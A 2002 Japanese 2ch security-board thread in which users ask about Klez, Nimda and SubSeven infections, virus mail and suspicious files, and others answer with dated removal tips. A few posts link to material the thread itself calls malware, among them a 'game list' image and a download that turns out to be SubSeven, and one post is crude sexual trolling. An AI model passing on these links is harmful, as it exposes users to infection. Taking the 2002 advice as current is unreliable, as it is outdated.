小林カツ代エクスプローラーとか、悲しい目をした犬みたいに、ブラウザの表示を変えるウイルスか何か、先月から散発的に話題になってますが。
誰かなにか情報持ってませんか?
漏れは被害に遭ってないけど。気になるんで。

219 :名無しさん@お腹いっぱい。:02/04/06 22:40
>>218
小林カツ代エクスプローラーはデスクトップアクセサリーの「何か。」が原因。
ここを参照。
ttp://www.ah.wakwak.com/~deep/products/restore.htm

220 :cheshire-cat:02/04/06 22:49
>>219
即レスどうもっす(感謝!
スキン関連(でいいのか?用語がわからんのだが)だったのか。

221 :名無しさん@お腹いっぱい。:02/04/07 21:31
今日になって、W32.klez.E@mmが多数送られてくる。
送信元にも確かに送られてきてるらしいんだけど、感染前に駆除をして
いるらしい。これって、感染してないマシンからでも、アドレス帳読み
取って送るものなのかな?
親感染元→子受信元(非感染)→孫受信元(感染)って経路は成り立つ
ものなのかな? それとも、親感染元→子だけで、子→孫って存在しな
いんだろうか・・・。んで、複数の子に送る際に、他の子のアドレスを
送信元と偽ってるんだろうか・・・。
うーん、シマンテックとかも感染していることを前提として説明してる
から、よくわからない。
だれか、教えて・・・。

222 :cheshire-cat:02/04/07 21:42
>>221
>感染してないマシンからでも、アドレス帳読み取って
そりゃないでしょう。

1)子感染元(非感染、と自称)が、感染しているのに気付かないか、もしくはその事実を隠している。
2)その子送信元(非感染)とやらのメアドが記載されているファイルが、孫送信元(感染)のパソに存在していた。
3)ただ単に送信元を偽装していた。

KLEZ系の送信元偽装のプロセスというかパターンって、どこにも明示されてないな(漏れが見つけられないだけかもしれないが)。

223 :名無しさん@お腹いっぱい。:02/04/07 22:32
>>218
>誰かなにか情報持ってませんか?
もう情報持ってるんでは?(ネタだろ)

224 :221@どもです:02/04/07 22:34
>>222
1)の可能性が一番高いと思ったりw
2)に関しては、こちらが孫にあたるので無いと思います。感染もして
いませんし、まったく知らない会社さんからでしたから。ただ、あまり
にも同業者系列の会社ばかりからだった点と、送信元のメアドが全て
support@〜だった点がひっかかります。こちらのアドレス(受信元)も
support@〜でした。誰かのリンク・アドレスでいっぺんに引っかかった
可能性があると思います。まあ、子・孫の関係とは別の問題ですが。
3)ですが、これが送信元偽装のプロセスに引っかかってきますね。こち
らも明示されているものを見つけられませんでした。

というか、cheshire-catさんにはマウスカーソルの強制移動の件でもレ
スを頂いた覚えがw
たびたびありがとう御座います。

225 :名無しさん@お腹いっぱい。:02/04/07 23:11
Hello,This is a special nice game
This game is my first work.
You're the first player.
I expect you would enjoy it.

kitty.exeってのがついていた。ウィルスなんだろうけど、マックに送られてモナー。

226 :cheshire-cat:02/04/07 23:11
>>223
漏れそっち系わからん、全く。
よそでもこの話題見つけたけど、結論が出てなかったし。
2chの速報性って凄いよね。

>>224
送信元のKLEZが送信者を偽装しているんですかね。
んで、パソ内のファイルから抽出したメアドを利用しているとか。
本当の送信者、メルのヘッダ見てチェックすればどうでしょうか。

でもやっぱり(1)、多いんでしょうね。
KLEZ系は送信者を偽装するっていうけど。
他のVilliで、漏れもそゆことあったし。

227 :cheshire-cat:02/04/07 23:19
>>225
本文、KLEZ.E系です。
漏れが持ってる情報では、この本文で送られる奴はpicacu.exe(85.3KB)だそうだけど。

メモしときます。

228 :cheshire-cat:02/04/07 23:21
>>225
すんません、ファイルサイズ幾つですか?

229 :名無しさん@お腹いっぱい。:02/04/07 23:41
送信者の偽装、添付ファイルについて書いてあったよ。
ココには書いてなかったけど、添付ファイルにはtxtもあるよ。
ウイルスバスターがウイルス削除済みのメールでも、開くと
添付されたjpgやtxtが別ウインドウで開くこともあるね。
OEのスクリプトの実行をオフにしていても、実行する方法が
あるらしい。

ttp://www.ipa.go.jp/security/topics/newvirus/klez.html

230 :cheshire-cat:02/04/07 23:56
>>229
4月2日か。遅いな〜

txt添付ってそいえばあったよ。内容はなんだか壊れて判別できなかった。
けど、勝手に開くか?

231 :229:02/04/08 00:50
うん、関連付けたビューアとかエディタで別窓開くよ。
その場合、「保存しますか?」のダイアログも出ない。
KLEZ全部じゃなくて、一部の亜種だと思う。
ダイアログ出るのもあるし。

こうなったら意地でもOE使い続けちゃる。(笑)

それと、オンラインソフトの紹介サイトでいまだにオレの
アドレス晒しっ放し(とっくに公開やめてるのに)の管理者
更新しないならヤメレ。


232 :221@どもどもです:02/04/08 00:56
>>229
これだ!!
でも、SARCもこのウィルスの情報はいらないって言ってたのに、4/2って
のはいかがなものかなー。発見日1/17で、2月には完全解明みたいなこと
言ってたのにw

でも、これですっきりしました。どうもありがとうございました。

233 :225:02/04/08 12:00
>>228
どうもありとうございます。マクのノートンが無視してくれたので、
気になっていました。

ウィルスのファイルサイズは88kで、16kの画像ファイルであるgeo_iceage4[1].jpgが一緒についていました。

234 :比較:02/04/08 22:32
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>クソースネクストバカフィー
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>ウイルス警備隊


235 :cheshire-cat:02/04/08 22:53
>>231
あのーですね。
それだとアンチウイルスソフトに未対応のvilliが着たら、ダイレクトアクションで即感染しませんか?

>>233
ファイルサイズが、はて。。。。。
また変種か。
MacのNortonで検出できなかったなら、代わりにウイルススキャンしましょうか?

というか、下さい。スキャンし終わったらメルで報告後、トレンドに送っておきます。

236 :  :02/04/08 22:56
今、英語で
「私の彼女の写真を見て!」という
メールがきました。
添付ファイルありでした。
ウイルスですよね?

237 :cheshire-cat:02/04/08 22:58
>>236
さあ。漏れが入ってる洋物情報MLでは、ありきたりな題名だけど。

ウイルススキャンしれ。

238 :名無しさん@お腹いっぱい。:02/04/09 00:07
やっと専用スレが立ちました

Klez系,Klez.Eスレッドhttp://pc.2ch.net/test/read.cgi/sec/1018248786/l50

239 :名無しさん@お腹いっぱい。:02/04/09 00:08
>>236
はっきりいって、ウィルススキャンするまでもない。
見るな、捨てろ。以上。

240 :名無しさん@お腹いっぱい。:02/04/09 00:14
インターネット悲しい目をした犬http://pc.2ch.net/test/read.cgi/sec/1018186700/l50

Ctrl+F用

241 :名無しさん@お腹いっぱい。:02/04/09 01:05
http://game.2ch.net/test/read.cgi/gsaloon/1017585093/
↑の393のリンク先へ行ったらノートンアンチウイルスが
反応しましたがウイルスの検疫ができずガーとものすごい音がしました。
その後怖くなってHDドライブをウイルススキャンしたんですが
何もウイルスが検出されませんでした。
これはただのブラクラなんでしょうか?
怖くてパソコンの電源が切れないので教えてください。

242 :名無しさん@お腹いっぱい。:02/04/09 01:21
>>241
うちで使ってる悪名高きワクチンソフト、ウイルス警備隊ではウイルス検出されたぞ。

JS.Exception.Exploit
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html


243 :binnkoro:02/04/09 03:31
のーとんでも検出されましゅよ。ふつうに。

244 :名無しさん@お腹いっぱい。:02/04/09 04:47
http://ime.nu/www.google.co.jp&page=@go5.163.com/sg9741/index.html?yuryo



245 :名無しさん@お腹いっぱい。:02/04/09 04:50
,,

246 :binnkoro:02/04/09 07:52
>>244
うぜーんだよしね

247 :名無しさん@お腹いっぱい。:02/04/09 20:07
先ほど、「Onclick」というタイトルのメールを受信し、メールを見た途端に
突然別ウィンドウでgif画像が表示されました。
セキュリティホールには気を付けて最新のパッチもあてているのに…。
ウィルスかどうか分からないのですが、ご存知の方情報をお願いします!

248 :名無しさん@お腹いっぱい。:02/04/09 20:17
>247
>メールを見た途端に
>突然別ウィンドウでgif画像が表示されました。
>セキュリティホールには気を付けて最新のパッチもあてているのに…。

それはメール自体がhtmlで書かれているからと思われる。
外国から来るスパムは大抵はHTMLで書かれているので、OEで受信して開くと、
自動的に実行してしまって表示するようになる。

それが嫌であれば他のメーラーを使うか、OEのプレビューを切る。
(OEのプレビューを切っても、開いては意味はないですが)

OEのプレビューの切り方
OutlookExpress を起動し、ローカルフォルダを選択して、
メニューバーから [表示] - [レイアウト] で「ウインドウのレイアウトのプロパティ」ダイアログボックスを表示し、
「プレビューウィンドウを表示する」のチェックを外す。

249 :名無しさん@お腹いっぱい。:02/04/09 20:35
>>248
サンクスコ

250 :名無しさん@お腹いっぱい。:02/04/09 21:26
すみません教えて下さい。。
ノートン入れてから始めてウィルス(klez)が届いたんですが、
検疫が済んだら添付されてたファイルは見ても大丈夫なんでしょうか?
JPEGでなにやら写真かなーとは思ったんですが、怖くて削除してしまいました。


251 :cheshire-cat:02/04/09 21:47
>>250
「検疫が済んだら、検疫されなかったjpgファイルは大丈夫か」、の意味か?

二重拡張子が「.jpg.pif」とかじゃなければ大丈夫だと思うが。
漏れならやらない。

252 :cheshire-cat:02/04/09 21:51
というか「pif」って拡張子、表示されないんだよね。
ファイルのプロパティで確認してちょ。

253 :250:02/04/09 22:00
>>251-252
レスありがとうございました。
見ないに越した事はないですね。
何かあってからでは遅いので、これからも潔く削除します!

254 :名無しさん@お腹いっぱい。:02/04/09 22:22
A IE 6.0 patchつうタイトルでなんかjpegと
interscan_safestamp.txtが添付されてるメールが来た。
もちろん知らない人から。新種のウイルスかなと思って
即削除したけど、これ今はやってないのかな?
ここ来てもだれも言ってないから。


255 :cheshire-cat:02/04/09 22:32
>>254
いや、もう似たようなのは幾つも既出だよ。
MSは個別のユーザーにわざわざそんな親切に、パッチ送ったりしないし。

ただ拡張子が二重だったのに君が気付いていなかっただけかと。
二重拡張子ってさっき書いたけど。
例えばEro.jpg.pifとかEro.txt.batみたいなやつ。

256 :名無しさん@お腹いっぱい。:02/04/09 22:40
>>254
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/policy/swdist.asp

257 :比較:02/04/10 00:03
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>クソースネクストバカフィー
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>ウイルス警備隊

258 :知人でも添付ファイルを開くな!:02/04/10 01:17
スキャンして、本人に送ったか確認して開け。
−−−−−
実行ファイルを送るアフォはいないと思うが。



259 :名無しさん@お腹いっぱい。:02/04/10 10:55
今日はsos!つータイトルのメールが来た。
本文なし、添付はjpeg偽装、本文見ようとすると
どっかからなにかをダウンロードするかどうか聞いてくるので
キャンセル、即削除した。これも既出?

260 :MS01−020を嫁!!!!!!!:02/04/10 13:08
 

261 :「嫁」は「読め」:02/04/10 13:09
  

262 : :02/04/10 13:32
昨日、初めてウイルスメールが届きました。
W32.Klez.E@mmでした。
今日も同じものが届きました。

263 :名無しさん@お腹いっぱい。:02/04/10 13:43
>>259-261 http://www.microsoft.com/japan/technet/security/bulletin/MS01-020.asp?frame=true

264 :名無しさん@お腹いっぱい。:02/04/10 14:23
すんません、質問っす。
昨日、PCを起動したら
HDDに保存しておいたmp3ファイルが全て消えて無くなってました。
明らかに自分で削除した覚えはありません。てゆーか前日までファイルはありました。
そういった類の症状を引き起こすウィルスとかってあります?
知人は「誰かがリモートで入って削除したんじゃねーの?」などと
言ってますが、そーゆう事は有りえます?

265 :名無しさん@お腹いっぱい。:02/04/10 14:30
>>264
ネットにつながっててadministratorのパスがnullで
netbios生きてたらさくっと消されるかもYO!

266 :名無しさん@お腹いっぱい。:02/04/10 15:00
バステロリストの綴り教えてください。
あと2chで、その関係のスレってありますか?
板は、ここで合ってますよね?

267 :名無しさん@お腹いっぱい。:02/04/10 15:12
irc.tokyo.wide.ad.jpにつなげると
port 113,80,3128,8080,10080へアクセスがあるのは何故ですか?

268 :名無しさん@お腹いっぱい。:02/04/10 17:20
今日、初めてノートンAntiVirusがウィルスを検出しました。
突然、「ウィルスがみつかりました!」みたいな画面になったのでビビリました。
見つかったウィルスは、W32.Nimda.E@mmです。
感染したのは、ファイル保存用のDドライブに置いてあった、あるソフトの中の
Riched20.dllというlファイルでした。修復できなかったので検疫に入れています。
HDDをスキャンしましたが他にはウィルスは検出されませんでした。
半年位前から置きっぱなしのファイルで、これまで何度もスキャンしましたが
ウィルスが見つかった事はありませんでした。
IEはパッチをあてているし、へんなメールも開いていません。
唯一こころあたりがあるというか、よくわからないのですが・・・
先日2台のPCでLANを組みました。昨日、ウィルスにかかったほうのPCの
Dドライブをフルアクセスで共有させました。共有させただけで、何もしてません。
もう1台のほうのPCはインターネットにはつながってません。
初めてのウィルスで少々戸惑ってます。この場合、感染ファイルのRiched20.dllと
それの入ってたソフトを削除すればいいのでしょうか?ご教授おねがいします。

269 :名無しさん@お腹いっぱい。:02/04/10 17:23
>>265
おぉ、レスありがとうございます。
確かにadminのpassはnullで常時接続でした。

怖いので今日帰ったらソッコーでpasswordを変更するつもりです。
根本的な解決にはならんと思いますが・・・。

270 :d:02/04/10 18:09
メールを見ようとしたら、なんかパスワードの再提示せよって出てきて
「盗難方法を〜〜〜」みたいなメッセージが出たんですけど
これってヤバいですか?
クラックされかけてる???

271 :名無しさん@お腹いっぱい。:02/04/10 18:25
>>270
特にヤバイということは無い。
クラックなどされていませんので安心してください。

272 :266:02/04/10 18:39
266ですが、どなたか『バステロリスト』に関する情報を
お持ちの方いらっしゃいますか?宜しくお願いします。


273 :電脳猟犬:02/04/10 18:50
IPAのHPから内閣官房情報セキュリティー対策推進室のHPのぞけるよん


274 :名無しさん@お腹いっぱい。:02/04/11 10:34
以前に来たメールのsubjectでウイルスを添付して返信するのは
なんていうウィルスなんでしょうか?

275 :名無しさん@お腹いっぱい。:02/04/11 10:59
今、送信者名も件名も無く、添付ファイルのついたメールが来たのですが、
開けないで削除した方がいいですか?
オークションをやっていて、連絡がまだ来ていない人がいるんですけど、
たとえその人からだったとしても、削除してもいいですよね?

276 : :02/04/11 11:33
mypartyのGとかHってやばそうなの?

277 :名無しさん@お腹いっぱい。:02/04/11 11:46
>>275 アンチウィルスソフト買えよ。

278 :名無しさん@お腹いっぱい。:02/04/11 12:04
>>277
あるんですけど、イマイチ使い方がわからないです。
前はウイルスメールを開いたら、警告してくれたのですが、
最近はそれで大丈夫なのか説明書見てもよくわからないので、
とりあえず開かないで削除するようにしていたのですが、
いつまでもそんなんでいいのかと・・・。

279 :名無しさん@お腹いっぱい。:02/04/11 12:53
>>278 使い方が分からないならソフト名を明らかにして初心者質問スレか
該当ソフトのスレできくべし。
>削除してもいいですよね?
それだけの情報で他人には分かるはずもなかろう。

280 :名無しさん@お腹いっぱい。:02/04/11 12:57
>>279
ありがとうございます。
質問できるようになるまでもう少し勉強してきた方がよさそうです。
また、出直してきます。

281 :名無しさん@お腹いっぱい。:02/04/11 12:57
メーラも、OSも、環境も、設定も伏せてるし。
処置なし。

282 :名無しさん@お腹いっぱい。:02/04/11 15:27
これって既出?
ttp://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020411/1/
ttp://www.microsoft.com/japan/technet/security/bulletin/ms02-018.asp

283 :page:02/04/11 15:44
得ろサイトをサーフィンしてたら、いつのまにか
デスクトップのアイコンがすべて消えてしまいました。
スタートうpからできますが、どうすればもとにもどる
のでしょうか?ていうかこれはウイルス?

284 :名無しさん@お腹いっぱい。:02/04/11 16:07
>>283
とりあえずウィルススキャンしろ。持ってなければオンラインスキャン。
http://www.trendmicro.co.jp/hcall/index.asp

285 :page:02/04/11 16:37
>>284
どうしてこうなったのか解らないのですが、
デスクトップのアイコンの表示にて元に戻りました。
お騒がせしました。

286 :名無しさん@お腹いっぱい。:02/04/11 17:01
>>285 元に戻ったからって安心するな。ウィルススキャンしておけ。

287 :page:02/04/11 17:38
>>285
スキャンしてみたらウイルス発見!!
ファイルを削除しました。これでOK?

288 :名無しさん@お腹いっぱい。:02/04/11 17:45
>>287 検出ウィルス名を教えて。ものによってはレジストリとかいろいろ
変えられてるかもしれないから。

289 :page:02/04/11 20:36
>>288
それが、すぐに消してしまったのでわかりましぇん。
いまのところ、自覚症状なしです。また何かあったら
書き込みます。

290 :名無しさん@お腹いっぱい。:02/04/11 21:55
>>289 アンチウィルスソフトの活動ログに書いてあるはずだから、確認し
たらここで報告してね。

291 :page:02/04/11 22:34
オンラインスキャンのため不可です。


292 :インターネット=ソープランドのマンコ:02/04/11 22:41
>>291

ナマでパコパコ!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートンでも買え!!!!!!!!!


293 :abe:02/04/11 22:44
www.araddin-i.net/aaw

ここの↑いつも携帯に流れてきて卯材!

攻撃を田のモー。

294 :page:02/04/11 23:09
>>292
了解(−_−)

295 :名無しさん@お腹いっぱい。:02/04/12 01:47
31Kの添付ファイルがメールで来ました・・。
なにもまだ起きないんですがウィルスですかね〜??教えて下さい。


296 :名無しさん@お腹いっぱい。:02/04/12 01:58
>>295
添付ファイル付きのメールがきたという以外の情報が無い状態で何をしろと?

297 :名無しさん@お腹いっぱい。:02/04/12 02:45
投票しる!

298 :名無しさん@お腹いっぱい。:02/04/12 03:12
今、メールチェックしたら添付ファイル60 .scr(79.2KB)と
kg_tam_framerate(1.17KB)あったんですよ。
ビビリながら開けたらウィルスらしく、検疫しました。
これって削除したらもうOKですか?
w32.klezなんとかってウィルスでした。

ちなみに件名は Undeliverable mail--"26.9 Plugin 60"
内容は
The following mail can't be sent to kopanda@cute.biglobe.ne.jp:

From: ************@****.*****.ad.jp
To: kopanda@cute.biglobe.ne.jp
Subject: 26.9 Plugin 60
The attachment is the original mail

kg_tam_framerate(1.17KB)の内容は
02/02/22 17:07 27.6578 Plugin 60
02/02/22 17:07 25.0000 Plugin 60
02/02/22 17:07 25.7143 Plugin 60
02/02/22 17:08 24.0000 Plugin 60
02/02/22 17:08 26.6877 Plugin 60
02/02/22 17:08 28.0541 Plugin 60
02/02/22 17:09 26.6799 Plugin 60
02/02/22 17:10 24.8048 Plugin 60
02/02/23 12:37 27.0 Plugin 60
02/02/23 12:37 24.4 Plugin 60
02/02/23 12:37 23.0 Plugin 60
02/02/23 12:37 25.6 Plugin 60
02/02/23 12:37 27.2 Plugin 60
02/02/23 12:39 27.1 Plugin 60
02/02/23 12:39 23.7 Plugin 60
02/02/23 12:39 27.2 Plugin 60
02/02/23 12:41 26.9 Plugin 60
02/02/23 12:41 28.3 Plugin 60
02/03/02 13:48 26.6 Plugin 60
02/03/02 13:49 22.7 Plugin 60
02/03/02 13:49 24.4 Plugin 60
02/03/02 13:49 27.4 Plugin 60
02/03/02 13:50 25.6 Plugin 60
02/03/02 13:51 27.8 Plugin 60
02/03/02 13:51 27.0 Plugin 60
02/03/02 13:52 27.5 Plugin 60
02/03/02 13:52 24.2 Plugin 60
02/03/02 13:52 25.7 Plugin 60
02/03/02 13:54 26.7 Plugin 60
02/03/02 13:55 24.8 Plugin 60
02/03/02 13:56 27.0 Plugin 60
02/03/02 13:56 26.4 Plugin 60
02/03/02 13:57 26.4 Plugin 60
02/03/02 13:57 25.2 Plugin 60
02/03/02 13:58 27.6 Plugin 60
02/03/

みたいな感じです。

299 ::02/04/12 14:25
http://headlines.yahoo.co.jp/hl?a=20020412-00000013-vgb-sci

後関係ないけど今現在LIveUpdateのサーバにつなげないなぜか。


300 :名無しさん@お腹いっぱい。:02/04/12 20:22
>>299
最近よくある
ちなみに、シマンテックのHPも開けない・・・鬱

301 :名無しさん@お腹いっぱい。:02/04/12 20:28
2chをやっていて、ウィルスに感染することはありますか?


302 :cheshire-cat:02/04/12 20:31
>>301
エロ系リンク踏んでエクセプション踏むことは、たま〜にある。

303 :名無しさん@お腹いっぱい。:02/04/12 20:35
>>299-300
今LiveUpdateもシマンテックのHPも大丈夫だったよ。直ったのかな。

304 :名無しさん@お腹いっぱい。 :02/04/12 20:49
スパイソフトって何ですか?

305 :名無しさん@お腹いっぱい。:02/04/12 21:05
WEBメール使ってたらウイルスには感染しないって
聞いたんですけどホント?

306 :名無しさん@お腹いっぱい。:02/04/12 21:17
ウイルスの入った添付ファイル開いてしまったら
WEBメールもメールソフトも一緒だと思われ・・

307 :名無しさん@お腹いっぱい。:02/04/12 21:18
>>304
ちょっと酸味の利いたソフトのことれす。

308 :名無しさん@お腹いっぱい。:02/04/12 21:29
WEBメールはアンチウイルスソフトを使っても
意味ないんですか?

309 :う゛ぁいお:02/04/12 21:36
>>304スパイソフト
http://www.zdnet.co.jp/help/howto/security/p02/index.html

310 :名無しさん@お腹いっぱい。:02/04/13 00:29
>>308
あるよ。

311 :名無しさん@お腹いっぱい。:02/04/13 02:56
WINDOWSフォルダ内に変なフォルダとファイルができていました。
ウイルスかなんかでしょうか?
フォルダ名、$NtUninstallQ315000$
みたいなフォルダが10個できてました。
その10個のフォルダ全部に、spuninst.exeという実行ファイルがあります。
あと、netsetup.exe Win32キャビネット自己展開ツールというファイルが
一つあります。
しかも、フォルダ名やファイル名が全部青色です。
ウイルスか、ダイヤルアップを書き換えるようなプログラムかなんかでしょうか?
誰か教えてください。

312 :名無しさん@お腹いっぱい。:02/04/13 03:04
>>311
想像だけど、WindowsXP使ってて、かつ、Windows Update 利用してるでしょ?

313 :名無しさん@お腹いっぱい。:02/04/13 03:17
>>311
Windows Update のアップデートをアンインストールするためのフォルダ。
ウィルスでも何でもない。変にいじると危険なだけなので放っとく。

314 :名無しさん@お腹いっぱい。:02/04/13 14:03
ウイルスバスタースレにいるコピペ馬鹿を
なんとかしたいのだが…。
もう、いいかげんにしてほしい。


315 :名無しさん@お腹いっぱい。:02/04/13 17:17
>>314
確かに凄いことになってるなぁ。
けど、2ちゃんの特性上、我々にはどうしようもない。
地道に削除依頼出したらどうですかとしか返答しようがない。

316 :名無しさん@お腹いっぱい。:02/04/13 18:02
>>314
同感!罵倒レスしたいところだが逆効果だろうし・・・・

317 :名無しさん@お腹いっぱい。:02/04/14 01:34
なぜか、今日いっぱい知らないアドレスからメールが来ました。
3年間一度もなかったのに。なんか変なトコ見たかな?

そして2台のPCに違うメルアドを入れてあるのですが
1台の方は1週間くらいネットには繋げてません。
なぜかその1台のメアドからもメールが来てました。
これはなんなんでしょう??
添付ファイル付いてたけどスキャンしても何もでません。
ウィルスじゃないのか、プロバイダーのメールサーバーで消されてるのか・・
同じファイルを何人かのメアドから送られました。
もう一個の方にも来てるみたいです。
何の理由が考えられるか わかる人いましたら教えて下さい。
なぜか、送ってくる相手のアドレスがDocomoのもあります。

318 :名無しさん@お腹いっぱい。:02/04/14 01:54
>>317
他の事は放っておいて、添付ファイルとやらは絶対開けないほうがいいことだけは分かる。

319 : :02/04/14 02:25
<<<はじめに一応書いておきますがこれはウィルスですので
落として実行しないでください。>>>
これは某所で貼り付けてあったゲームリストなんですが
これのウィルスの名前って何ですか?私は実行したため
ウィンドウズが起動しなくなってしまったもので・・・
すごく気になるので教えてください。
これです↓
ttp://de.geocities.com/dssjd4hd/medes.jpg

320 :名無しさん@お腹いっぱい。:02/04/14 02:47
>>318
携帯に転送されたの見て、アウトルックで開かずに
ゴミ箱ぽいしましたが
気になったので 戻してスキャンかけました。
サーバーが駆除してくれたのかなー?
でももう一個のアドから来たのはなんなのか謎・・


321 :ぁぅ:02/04/14 03:05
http://tmp.2ch.net/test/read.cgi/download/1016328703/
のスレッドの373をDLして、起動したらNETにつながらなくなってしまいました。
対処方法分かる方教えてください。

322 :名無しさん@お腹いっぱい。:02/04/14 03:31
私はnet初心者なんですがいつからかwscriptってのがバンバン立ち上がって
きてメモリ不足に陥ります。ウイルスのせいなのかよく分からないのですが
誰か助けて下さい。お願いします。


323 :ぁぅ:02/04/14 03:32
インターネットオプションの接続のタブを開くと
毎回固まって、どうなってるのか見れないです・・

324 :名無しさん@お腹いっぱい。:02/04/14 04:07
む?

325 :名無しさん@お腹いっぱい。:02/04/14 04:31
>>314-316
そういうのはスレ2個使うといいよ

バスターVSノートンスレが まだ残っていたと思うから
それ使えば?

326 :名無しさん@お腹いっぱい。:02/04/14 05:56
>>319
こういうのはココで聞け。
【勇気が無くてみれない画像スレッド】
http://ex.2ch.net/test/read.cgi/entrance/1018680687/l50

327 :名無しさん@お腹いっぱい。:02/04/14 05:58
>>322
wscriptってコレ?
http://www.symantec.com/region/jp/sarcj/data/w/wscript.kakworm.html

違ってたら教えて

328 :名無しさん@お腹いっぱい。:02/04/14 06:00
>>321
書いてあるリンク先死んでる。
ので、何が原因なのか分かりようがない。

329 :名無しさん@お腹いっぱい。:02/04/14 06:48
>>321
どうでもいいが、説明もなしにいきなりリンクがぽんと放り込んであって、
かつその後のレスでなんにも触れられていないのをどうしてDLする?
DLするまではアリかも知らんが何故実行する?

330 :名無しさん@お腹いっぱい。:02/04/14 07:27
>>321
落としたぞ。SubSevenだな。
readmeは中途半端だわ、setup.iniはSinger Song Writerのだわ、
そりゃマシンの調子も悪くなるわ。
なんで、readmeも読まずに実行する。読めば怪しいの一発でわかるぞ。

331 :名無しさん@お腹いっぱい。:02/04/14 08:25
すいません 98を使ってるのですが
起動して デスクトップの画面になると
c:¥WINDOWS¥syslog.vbs
メモリ不足のため このアプリケーションを実行できません
と 表示され 何も出来ない状態になります。

これって 何かに汚染されたのでしょうか?
それとも故障ですかね。
わかる方 御教示お願いします。

332 :名無しさん@お腹いっぱい。:02/04/14 08:46
command prompt onlyで起動して

ren \windows\syslog.vbs syslog.old

再起動してまともに動くならそいつ消す。

333 :名無しさん@お腹いっぱい。:02/04/14 09:54
他スレに誤爆しました。再掲します。

ウィンドウズ98を使用しています。IEのバージョンは5.00。
メーラーはOE。
あやしいメールをゴミ箱に捨てようとしてうっかり開いてしまい、
ウイルスバスターのオンラインスキャンにかけたら、
WORM_KLEZ.E というファイルが3つ、C:\WINDOWS\Temporary Internet Filesの
中に出来ているのがわかりました。
トレンドマイクロ社の以下のページは見ました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E

これを見るとWORM_KLEZ.E の3ファイルを、手動で削除すれば
大丈夫と解釈しましたが、それでいいでしょうか?
他になにかしなければならない処理はありますか?


334 :cheshire-cat:02/04/14 10:00
>>333
アドレス帳に記入されている人全員に、「ウイルス送っちゃったかも、きゃは!」、って注意メールを送る。

335 :名無しさん@お腹いっぱい。:02/04/14 10:05
>>333
日本語読めてます? Registryもいじれときちんと書いてます。
よくわからないんだったらツールがちゃんとそこのページにおいてあるから、
それ使えばいいじゃないか。

336 :cheshire-cat:02/04/14 10:17
>>335
口調は悪いけど、親切なイイ人ですね(と思った

337 :333:02/04/14 10:57
>>334-336
すいません。ご親切にどうもありがとうございました。

338 :a:02/04/14 18:22
メールでpowerfull toolていうのが送られてきたんですが
ウィルスでしょうか?

339 :名無しさん@お腹いっぱい。:02/04/14 18:24
>>338
十中八九ウイルスかトロイです。

340 :a:02/04/14 18:27
やっぱそうでしたか添えつきファイルで文も英語でしたから。
削除して良かったぁ。厨房ですいません

341 :321:02/04/14 18:45
>>329
VShieldでチェックしても何も出なかったから、
軽い気持ちで・・。
全く持ってお恥ずかしいです。
>>330
Sub7って昔っからあるトロイですよね?
何で引っかからなかったかな・・。
>readmeは中途半端だわ、setup.iniはSinger Song Writerのだわ
ですよね・・。昨日からずっと自己嫌悪です。

それで、対処方法なんですが・・
いくら調べても、Sub7はウィルスチェックソフトで、削除。
としか記されていないんですが、検出されない場合はどうすれば・・?
WIN.INIやSYSTEM.INIを書き直さなければいけないんでしょうか?
どうか助けてください。

342 :cheshire-cat:02/04/14 18:51
>>341
本体削除と、レジストリ修復と、SYSTEM.INIとWIN.INIの修復がそれぞれ必要なんじゃ?

343 :名無しさん@お腹いっぱい。:02/04/14 19:29
>>341
ttp://www.ace.comp.nec.co.jp/AntiVirus/virus/TROJ_SUB722.htm

ほい。
でも、挙動がSubsevenと違うような気がするんだよなぁ。
